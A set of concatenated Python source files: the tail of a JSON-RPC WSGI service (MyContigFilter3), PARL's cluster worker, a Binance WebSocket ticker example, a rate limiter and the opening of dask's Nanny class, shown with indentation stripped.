req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'MyContigFilter3 ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
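# Usage sketch (added, for local testing): run the service in a child process
# on a system-assigned port, exercise it over HTTP, then shut it down.
def _demo_run_service():
    port = start_server(newprocess=True)  # returns the bound port
    # ... POST JSON-RPC requests to http://localhost:<port> here ...
    stop_server()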
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
worker.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cloudpickle
import multiprocessing
import os
import psutil
import signal
import socket
import subprocess
import sys
import tempfile
import time
import threading
import warnings
import zmq
from datetime import datetime
import parl
from parl.utils import get_ip_address, to_byte, to_str, logger, _IS_WINDOWS, kill_process
from parl.remote import remote_constants
from parl.remote.message import InitializedWorker
from parl.remote.status import WorkerStatus
from parl.remote.zmq_utils import create_server_socket, create_client_socket
from parl.remote.grpc_heartbeat import HeartbeatServerThread, HeartbeatClientThread
from six.moves import queue
from parl.remote.utils import get_version
class Worker(object):
"""Worker provides the cpu computation resources for the cluster.
A worker node is connected to the master node and will send its
computation resources information to the master node. When a worker
node is created, it will start `cpu_num` empty jobs and these jobs'
ip addresses will be send to the master node. Further, when an old
job is killed, worker will start a new job and send the new job ip
address to the master node.
To start a worker, we use the following xparl command line api:
    .. code-block:: bash
xparl connect --address localhost:1234 --cpu_num 8
Attributes:
master_address (str): Master's ip address.
request_master_socket (zmq.Context.socket): A socket which sends job
address to the master node.
reply_job_socket (zmq.Context.socket): A socket which receives
job_address from the job.
remove_job_socket (zmq.Context.socket): A socket that receives commands to remove the job from jobs immediately.
Used to remove the dead job immediately and allocate a new job
instead of waiting for the heartbeat failure.
job_buffer (str): A buffer that stores initialized jobs for providing new jobs in a short time.
Args:
master_address (str): IP address of the master node.
cpu_num (int): Number of cpu to be used on the worker.
"""
def __init__(self, master_address, cpu_num=None, log_server_port=None):
self.lock = threading.Lock()
self.ctx = zmq.Context.instance()
self.master_address = master_address
self.master_is_alive = True
self.worker_is_alive = True
self.worker_status = None # initialized at `self._create_jobs`
self._set_cpu_num(cpu_num)
self.job_buffer = queue.Queue(maxsize=self.cpu_num)
self._create_sockets()
self.check_env_consistency()
# create log server
self.log_server_proc, self.log_server_address = self._create_log_server(
port=log_server_port)
# create a thread that waits commands from the job to kill the job.
self.remove_job_thread = threading.Thread(
target=self._reply_remove_job)
self.remove_job_thread.setDaemon(True)
self.remove_job_thread.start()
self._create_jobs()
# create a thread that initializes jobs and adds them into the job_buffer
job_thread = threading.Thread(target=self._fill_job_buffer)
job_thread.setDaemon(True)
job_thread.start()
thread = threading.Thread(target=self._update_worker_status_to_master)
thread.setDaemon(True)
thread.start()
def _set_cpu_num(self, cpu_num=None):
"""set useable cpu number for worker"""
if cpu_num is not None:
assert isinstance(
cpu_num, int
), "cpu_num should be INT type, please check the input type."
self.cpu_num = cpu_num
else:
self.cpu_num = multiprocessing.cpu_count()
def check_env_consistency(self):
        '''Verify that the parl & python versions, as well as some other packages,
        in the 'worker' process match those of the 'master' process.'''
self.request_master_socket.send_multipart(
[remote_constants.CHECK_VERSION_TAG])
message = self.request_master_socket.recv_multipart()
tag = message[0]
if tag == remote_constants.NORMAL_TAG:
worker_parl_version = parl.__version__
worker_python_version_major = str(sys.version_info.major)
worker_python_version_minor = str(sys.version_info.minor)
assert worker_parl_version == to_str(message[1]) and worker_python_version_major == to_str(message[2])\
and worker_python_version_minor == to_str(message[3]),\
'''Version mismatch: the "master" is of version "parl={}, python={}.{}". However, \
"parl={}, python={}.{}"is provided in your environment.'''.format(
to_str(message[1]), to_str(message[2]), to_str(message[3]),
worker_parl_version, worker_python_version_major, worker_python_version_minor
)
worker_pyarrow_version = str(get_version('pyarrow'))
master_pyarrow_version = to_str(message[4])
if worker_pyarrow_version != master_pyarrow_version:
if master_pyarrow_version == 'None':
error_message = """"pyarrow" is provided in your current enviroment, however, it is not \
found in "master"'s environment. To use "pyarrow" for serialization, please install \
"pyarrow={}" in "master"'s environment!""".format(worker_pyarrow_version)
elif worker_pyarrow_version == 'None':
error_message = """"pyarrow" is provided in "master"'s enviroment, however, it is not \
found in your current environment. To use "pyarrow" for serialization, please install \
"pyarrow={}" in your current environment!""".format(master_pyarrow_version)
else:
error_message = '''Version mismatch: the 'master' is of version 'pyarrow={}'. However, \
'pyarrow={}' is provided in your current environment.'''.format(
master_pyarrow_version, worker_pyarrow_version)
raise Exception(error_message)
else:
raise NotImplementedError
def _create_sockets(self):
"""Each worker maintains four sockets:
(1) request_master_socket: sends job address to master node.
(2) reply_job_socket: receives job_address from subprocess.
(3) remove_job_socket : receives commands to remove the job from jobs immediately.
Used to remove the dead job immediately and allocate a new job
instead of waiting for the heartbeat failure.
(4) reply_log_server_socket: receives log_server_heartbeat_address from subprocess.
When a job starts, a new heartbeat socket is created to receive
heartbeat signals from the job.
"""
self.worker_ip = get_ip_address()
# request_master_socket: sends job address to master
self.request_master_socket = self.ctx.socket(zmq.REQ)
self.request_master_socket.linger = 0
# wait for 0.5 second to check whether master is started
self.request_master_socket.setsockopt(zmq.RCVTIMEO, 500)
self.request_master_socket.connect("tcp://" + self.master_address)
# reply_job_socket: receives job_address from subprocess
self.reply_job_socket = self.ctx.socket(zmq.REP)
self.reply_job_socket.linger = 0
reply_job_port = self.reply_job_socket.bind_to_random_port("tcp://*")
self.reply_job_address = "{}:{}".format(self.worker_ip, reply_job_port)
# remove_job_socket
self.remove_job_socket = self.ctx.socket(zmq.REP)
self.remove_job_socket.linger = 0
remove_job_port = self.remove_job_socket.bind_to_random_port("tcp://*")
self.remove_job_address = "{}:{}".format(self.worker_ip,
remove_job_port)
# reply_log_server_socket: receives log_server_heartbeat_address from subprocess
self.reply_log_server_socket, reply_log_server_port = create_server_socket(
self.ctx)
self.reply_log_server_address = "{}:{}".format(self.worker_ip,
reply_log_server_port)
def _create_jobs(self):
"""Create jobs and send a instance of ``InitializedWorker`` that contains the worker information to the master."""
try:
self.request_master_socket.send_multipart(
[remote_constants.WORKER_CONNECT_TAG])
_ = self.request_master_socket.recv_multipart()
except zmq.error.Again as e:
logger.error("Can not connect to the master, "
"please check if master is started.")
self.master_is_alive = False
return
initialized_jobs = self._init_jobs(job_num=self.cpu_num)
self.request_master_socket.setsockopt(
zmq.RCVTIMEO, remote_constants.HEARTBEAT_TIMEOUT_S * 1000)
def master_heartbeat_exit_callback_func():
logger.warning(
"[Worker] lost connection with the master, will exit reply heartbeat for master."
)
if self.worker_status is not None:
self.worker_status.clear()
self.log_server_proc.kill()
self.log_server_proc.wait()
# exit the worker
self.exit()
self.master_heartbeat_thread = HeartbeatServerThread(
heartbeat_exit_callback_func=master_heartbeat_exit_callback_func)
self.master_heartbeat_thread.setDaemon(True)
self.master_heartbeat_thread.start()
self.master_heartbeat_address = self.master_heartbeat_thread.get_address(
)
logger.set_dir(
os.path.expanduser('~/.parl_data/worker/{}'.format(
self.master_heartbeat_address.replace(':', '_'))))
logger.info("[Worker] Connect to the master node successfully. "
"({} CPUs)".format(self.cpu_num))
for job in initialized_jobs:
job.worker_address = self.master_heartbeat_address
initialized_worker = InitializedWorker(self.master_heartbeat_address,
initialized_jobs, self.cpu_num,
socket.gethostname())
self.request_master_socket.send_multipart([
remote_constants.WORKER_INITIALIZED_TAG,
cloudpickle.dumps(initialized_worker)
])
_ = self.request_master_socket.recv_multipart()
self.worker_status = WorkerStatus(self.master_heartbeat_address,
initialized_jobs, self.cpu_num)
def _fill_job_buffer(self):
"""An endless loop that adds initialized job into the job buffer"""
initialized_jobs = []
while self.worker_is_alive:
if self.job_buffer.full() is False:
job_num = self.cpu_num - self.job_buffer.qsize()
if job_num > 0:
initialized_jobs = self._init_jobs(job_num=job_num)
for job in initialized_jobs:
self.job_buffer.put(job)
time.sleep(0.02)
self.exit()
def _init_jobs(self, job_num):
"""Create jobs.
Args:
job_num(int): the number of jobs to create.
"""
job_file = __file__.replace('worker.pyc', 'job.py')
job_file = job_file.replace('worker.py', 'job.py')
command = [
sys.executable, job_file, "--worker_address",
self.reply_job_address, "--log_server_address",
self.log_server_address
]
if sys.version_info.major == 3:
warnings.simplefilter("ignore", ResourceWarning)
# avoid that many jobs are killed and restarted at the same time.
self.lock.acquire()
# Redirect the output to DEVNULL
FNULL = open(os.devnull, 'w')
for _ in range(job_num):
subprocess.Popen(command, stdout=FNULL, close_fds=True)
FNULL.close()
new_jobs = []
for _ in range(job_num):
job_message = self.reply_job_socket.recv_multipart()
self.reply_job_socket.send_multipart([
remote_constants.NORMAL_TAG,
to_byte(self.remove_job_address)
])
initialized_job = cloudpickle.loads(job_message[1])
new_jobs.append(initialized_job)
def heartbeat_exit_callback_func(job):
job.is_alive = False
logger.warning(
"[Worker] lost connection with the job:{}".format(
job.job_address))
if self.master_is_alive and self.worker_is_alive:
self._remove_job(job.job_address)
# a thread for sending heartbeat signals to job
thread = HeartbeatClientThread(
initialized_job.worker_heartbeat_address,
heartbeat_exit_callback_func=heartbeat_exit_callback_func,
exit_func_args=(initialized_job, ))
thread.setDaemon(True)
thread.start()
self.lock.release()
assert len(new_jobs) > 0, "init jobs failed"
return new_jobs
def _remove_job(self, job_address):
"""Kill a job process and update worker information"""
success = self.worker_status.remove_job(job_address)
if success:
while True:
initialized_job = self.job_buffer.get()
initialized_job.worker_address = self.master_heartbeat_address
if initialized_job.is_alive:
self.worker_status.add_job(initialized_job)
if not initialized_job.is_alive: # make sure that the job is still alive.
self.worker_status.remove_job(
initialized_job.job_address)
continue
else:
logger.warning(
"[Worker] a dead job found. The job buffer will not accept this one."
)
if initialized_job.is_alive:
break
self.lock.acquire()
self.request_master_socket.send_multipart([
remote_constants.NEW_JOB_TAG,
cloudpickle.dumps(initialized_job),
to_byte(job_address)
])
_ = self.request_master_socket.recv_multipart()
self.lock.release()
def _reply_remove_job(self):
"""Worker starts a thread to wait jobs' commands to remove the job immediately"""
self.remove_job_socket.linger = 0
self.remove_job_socket.setsockopt(
zmq.RCVTIMEO, remote_constants.HEARTBEAT_RCVTIMEO_S * 1000)
while self.worker_is_alive and self.master_is_alive:
try:
message = self.remove_job_socket.recv_multipart()
tag = message[0]
assert tag == remote_constants.KILLJOB_TAG
to_remove_job_address = to_str(message[1])
self._remove_job(to_remove_job_address)
self.remove_job_socket.send_multipart(
[remote_constants.NORMAL_TAG])
except zmq.error.Again as e:
#detect whether `self.worker_is_alive` is True periodically
pass
def _get_worker_status(self):
now = datetime.strftime(datetime.now(), '%H:%M:%S')
virtual_memory = psutil.virtual_memory()
total_memory = round(virtual_memory[0] / (1024**3), 2)
used_memory = round(virtual_memory[3] / (1024**3), 2)
vacant_memory = round(total_memory - used_memory, 2)
if _IS_WINDOWS:
load_average = round(psutil.getloadavg()[0], 2)
else:
load_average = round(os.getloadavg()[0], 2)
update_status = {
"vacant_memory": vacant_memory,
"used_memory": used_memory,
"load_time": now,
"load_value": load_average
}
return update_status
def _update_worker_status_to_master(self):
while self.master_is_alive and self.worker_is_alive:
worker_status = self._get_worker_status()
self.lock.acquire()
try:
self.request_master_socket.send_multipart([
remote_constants.WORKER_STATUS_UPDATE_TAG,
to_byte(self.master_heartbeat_address),
cloudpickle.dumps(worker_status)
])
message = self.request_master_socket.recv_multipart()
except zmq.error.Again as e:
self.master_is_alive = False
finally:
self.lock.release()
time.sleep(remote_constants.HEARTBEAT_INTERVAL_S)
def _create_log_server(self, port):
log_server_file = __file__.replace('worker.pyc', 'log_server.py')
log_server_file = log_server_file.replace('worker.py', 'log_server.py')
if port is None:
port = "0" # `0` means using a random port in flask
command = [
sys.executable,
log_server_file,
"--port",
str(port),
"--log_dir",
"~/.parl_data/job/",
"--line_num",
"500",
"--worker_address",
self.reply_log_server_address,
]
if sys.version_info.major == 3:
warnings.simplefilter("ignore", ResourceWarning)
if _IS_WINDOWS:
FNULL = tempfile.TemporaryFile()
else:
FNULL = open(os.devnull, 'w')
log_server_proc = subprocess.Popen(
command, stdout=FNULL, close_fds=True)
FNULL.close()
log_server_address = "{}:{}".format(self.worker_ip, port)
message = self.reply_log_server_socket.recv_multipart()
log_server_heartbeat_addr = to_str(message[1])
self.reply_log_server_socket.send_multipart(
[remote_constants.NORMAL_TAG])
def heartbeat_exit_callback_func():
# only output warning
logger.warning("[Worker] lost connection with the log_server.")
# a thread for sending heartbeat signals to log_server
thread = HeartbeatClientThread(
log_server_heartbeat_addr,
heartbeat_exit_callback_func=heartbeat_exit_callback_func)
thread.setDaemon(True)
thread.start()
return log_server_proc, log_server_address
def exit(self):
"""close the worker"""
self.worker_is_alive = False
kill_process('remote/job.py.*{}'.format(self.reply_job_address))
if self.master_heartbeat_thread.is_alive():
self.master_heartbeat_thread.exit()
def run(self):
"""Keep running until it lost connection with the master.
"""
if self.worker_is_alive:
self.master_heartbeat_thread.join()
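# Usage sketch (added; the master address is hypothetical, workers are
# normally started with the `xparl connect` command shown in the docstring):
def _demo_start_worker():
    worker = Worker('localhost:1234', cpu_num=4)
    worker.run()  # blocks until the connection to the master is lost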
|
example_ticker_and_miniticker.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_ticker_and_miniticker.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2020, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import os
import time
import threading
import logging
# import class to process stream data
from example_process_streams import BinanceWebSocketApiProcessStreams
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(level=logging.DEBUG,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
# create instance of BinanceWebSocketApiManager and provide the function for stream processing
binance_websocket_api_manager = BinanceWebSocketApiManager(BinanceWebSocketApiProcessStreams.process_stream_data)
# binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
        else:
            print(oldest_stream_data_from_stream_buffer)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
# create streams
print("\r\n========================================== Starting ticker all ========================================\r\n")
ticker_arr_stream_id = binance_websocket_api_manager.create_stream("arr", "!ticker")
time.sleep(7)
binance_websocket_api_manager.stop_stream(ticker_arr_stream_id)
time.sleep(2)
print("\r\n=========================================== Stopp ticker all ==========================================\r\n")
print("\r\n============================================ Starting ticker ==========================================\r\n")
ticker_stream_id = binance_websocket_api_manager.create_stream("ticker", ['bnbbtc', 'ethbtc'])
time.sleep(7)
binance_websocket_api_manager.stop_stream(ticker_stream_id)
time.sleep(2)
print("\r\n============================================== Stop ticker ===========================================\r\n")
print("\r\n======================================== Starting !miniTicker arr =====================================\r\n")
miniTicker_arr_stream_id = binance_websocket_api_manager.create_stream("arr", "!miniTicker")
time.sleep(7)
binance_websocket_api_manager.stop_stream(miniTicker_arr_stream_id)
time.sleep(2)
print("\r\n========================================== Stop !miniTicker arr =======================================\r\n")
print("\r\n========================================== Starting miniTicker ========================================\r\n")
miniTicker_stream_id = binance_websocket_api_manager.create_stream("miniTicker", ['bnbbtc', 'ethbtc'])
time.sleep(7)
binance_websocket_api_manager.stop_stream(miniTicker_stream_id)
time.sleep(2)
print("\r\n============================================ Stop miniTicker==========================================\r\n")
binance_websocket_api_manager.print_summary()
binance_websocket_api_manager.stop_manager_with_all_streams()
|
limiter.py
|
# coding: utf-8
from __future__ import unicode_literals
import time
from datetime import datetime
from queue import Queue, Full, Empty
from threading import Thread
class BaseRateLimiter(object):
def __init__(self, rate):
self.rate = rate
def acquire(self, count=1):
raise NotImplementedError()
class ThreadingRateLimiter(BaseRateLimiter):
    def __init__(self, rate):
        super(ThreadingRateLimiter, self).__init__(rate)
        self.queue = Queue(rate)
        # drain tokens in a daemon thread so the interpreter can still exit
        # while a limiter instance is alive
        clear_thread = Thread(target=self._clear_queue)
        clear_thread.daemon = True
        clear_thread.start()
def acquire(self, count=1):
try:
self.queue.put(1, block=False)
except Full:
return False
return True
def _clear_queue(self):
while True:
time.sleep(1.0 / self.rate)
try:
self.queue.get(block=False)
except Empty:
pass
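# Usage sketch (added): a limiter with rate=5 holds at most 5 tokens at once;
# the draining thread frees one slot every 1/rate seconds, so bursts beyond
# the rate are rejected immediately rather than queued.
def _demo_threading_rate_limiter():
    limiter = ThreadingRateLimiter(rate=5)
    granted = sum(1 for _ in range(10) if limiter.acquire())
    return granted  # roughly 5 of the 10 immediate requests succeed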
class DistributeRateLimiter(BaseRateLimiter):
def __init__(self, rate, cache):
super(DistributeRateLimiter, self).__init__(rate)
self.cache = cache
    def acquire(self, count=1, expires=3, key=None, callback=None):
        try:
            if isinstance(self.cache, Cache):
                return self.cache.fetch_token(rate=self.rate, count=count, expires=expires, key=key)
            # unknown cache type: fail open instead of implicitly returning None
            return True
        except Exception as ex:
            # cache errors also fail open so the limiter never blocks traffic
            return True
class Cache(object):
def __init__(self):
self.key = 'default'
self.namespace = 'ratelimiter'
def fetch_token(self, *args, **kwargs):
raise NotImplementedError()
class RedisTokenCache(Cache):
def __init__(self, redis_instance):
super(RedisTokenCache, self).__init__()
self.redis = redis_instance
def fetch_token(self, rate, count=1, expires=3, key=None):
date = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
key = ":".join([self.namespace, key if key else self.key, date])
try:
current = self.redis.get(key)
            # deny once this second's counter has reached the allowed rate
            if int(current if current else 0) >= rate:
return False
else:
with self.redis.pipeline() as p:
p.multi()
p.incr(key, count)
p.expire(key, int(expires if expires else 3))
p.execute()
return True
except Exception as ex:
return False
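# Usage sketch (added; assumes a reachable Redis server and the third-party
# `redis` package, neither of which this module itself requires):
def _demo_distributed_rate_limiter():
    import redis
    cache = RedisTokenCache(redis.StrictRedis(host='localhost', port=6379))
    limiter = DistributeRateLimiter(rate=100, cache=cache)
    return limiter.acquire(key='api:endpoint')  # True while under the per-second rate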
|
nanny.py
|
import asyncio
from contextlib import suppress
import errno
import logging
from multiprocessing.queues import Empty
import os
import psutil
import shutil
import threading
import uuid
import warnings
import weakref
import dask
from dask.system import CPU_COUNT
from tornado.ioloop import IOLoop, PeriodicCallback
from tornado import gen
from .comm import get_address_host, unparse_host_port
from .comm.addressing import address_from_user_args
from .core import RPCClosed, CommClosedError, coerce_to_address, Status
from .metrics import time
from .node import ServerNode
from . import preloading
from .process import AsyncProcess
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
get_ip,
mp_context,
silence_logging,
json_load_robust,
parse_timedelta,
parse_ports,
TimeoutError,
)
from .worker import run, parse_memory_limit, Worker
logger = logging.getLogger(__name__)
class Nanny(ServerNode):
"""A process to manage worker processes
    The nanny spins up Worker processes, watches them, and kills or restarts
    them as necessary. It is necessary if you want to use the
    ``Client.restart`` method, or to restart the worker automatically if
    it gets to the terminate fraction of its memory limit.
The parameters for the Nanny are mostly the same as those for the Worker.
See Also
--------
Worker
"""
_instances = weakref.WeakSet()
process = None
status = Status.undefined
def __init__(
self,
scheduler_ip=None,
scheduler_port=None,
scheduler_file=None,
worker_port=0,
nthreads=None,
ncores=None,
loop=None,
local_dir=None,
local_directory=None,
services=None,
name=None,
memory_limit="auto",
reconnect=True,
validate=False,
quiet=False,
resources=None,
silence_logs=None,
death_timeout=None,
preload=None,
preload_argv=None,
preload_nanny=None,
preload_nanny_argv=None,
security=None,
contact_address=None,
listen_address=None,
worker_class=None,
env=None,
interface=None,
host=None,
port=None,
protocol=None,
config=None,
**worker_kwargs,
):
self._setup_logging(logger)
self.loop = loop or IOLoop.current()
if isinstance(security, dict):
security = Security(**security)
self.security = security or Security()
assert isinstance(self.security, Security)
self.connection_args = self.security.get_connection_args("worker")
if scheduler_file:
cfg = json_load_robust(scheduler_file)
self.scheduler_addr = cfg["address"]
elif scheduler_ip is None and dask.config.get("scheduler-address"):
self.scheduler_addr = dask.config.get("scheduler-address")
elif scheduler_port is None:
self.scheduler_addr = coerce_to_address(scheduler_ip)
else:
self.scheduler_addr = coerce_to_address((scheduler_ip, scheduler_port))
if protocol is None:
protocol_address = self.scheduler_addr.split("://")
if len(protocol_address) == 2:
protocol = protocol_address[0]
if ncores is not None:
warnings.warn("the ncores= parameter has moved to nthreads=")
nthreads = ncores
self._given_worker_port = worker_port
self.nthreads = nthreads or CPU_COUNT
self.reconnect = reconnect
self.validate = validate
self.resources = resources
self.death_timeout = parse_timedelta(death_timeout)
self.preload = preload
if self.preload is None:
self.preload = dask.config.get("distributed.worker.preload")
self.preload_argv = preload_argv
if self.preload_argv is None:
self.preload_argv = dask.config.get("distributed.worker.preload-argv")
if preload_nanny is None:
preload_nanny = dask.config.get("distributed.nanny.preload")
if preload_nanny_argv is None:
preload_nanny_argv = dask.config.get("distributed.nanny.preload-argv")
self.Worker = Worker if worker_class is None else worker_class
self.env = env or {}
self.config = config or {}
worker_kwargs.update(
{
"port": worker_port,
"interface": interface,
"protocol": protocol,
"host": host,
}
)
self.worker_kwargs = worker_kwargs
self.contact_address = contact_address
self.memory_terminate_fraction = dask.config.get(
"distributed.worker.memory.terminate"
)
if local_dir is not None:
warnings.warn("The local_dir keyword has moved to local_directory")
local_directory = local_dir
if local_directory is None:
local_directory = dask.config.get("temporary-directory") or os.getcwd()
if not os.path.exists(local_directory):
os.makedirs(local_directory)
local_directory = os.path.join(local_directory, "dask-worker-space")
self.local_directory = local_directory
self.preloads = preloading.process_preloads(
self, preload_nanny, preload_nanny_argv, file_dir=self.local_directory
)
self.services = services
self.name = name
